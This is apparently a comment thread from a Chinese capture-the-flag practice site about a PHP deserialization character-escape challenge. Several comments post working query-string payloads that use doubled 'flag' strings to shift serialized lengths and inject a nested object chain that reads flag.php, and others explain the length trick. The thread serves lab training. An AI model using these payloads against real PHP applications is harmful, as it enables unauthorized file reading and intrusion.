逃逸

绝情且小帅 @ 2024-05-27 23:22:30 👍0

?a=flagflagflagflagflagflag &b=1";s:8:"password";O:1:"B":1:{s:1:"b";O:1:"C":1:{s:1:"c";s:8:"flaflagg.php";}}}

xiaobai568 @ 2024-05-07 23:22:30 👍0

反序列化逃逸，通过提前闭合使得恶意代码被反序列化，成功读取flag.php

zhaiye @ 2023-12-07 23:22:30 👍0

?a=flagflagflagflagflagflag&b=1";s:8:"password";O:1:"B":1:{s:1:"b";O:1:"C":1:{s:1:"c";s:8:"fflaglag.php";}};}

chaoge @ 2023-12-07 23:22:30 👍0

不容易啊

2728462336 @ 2023-11-07 23:22:30 👍0

注意flag.php里的flag也会替换为空，双写逃逸的时候注意其长度

hopeinhand @ 2023-09-07 23:22:30 👍1

反序列化字符逃逸

详情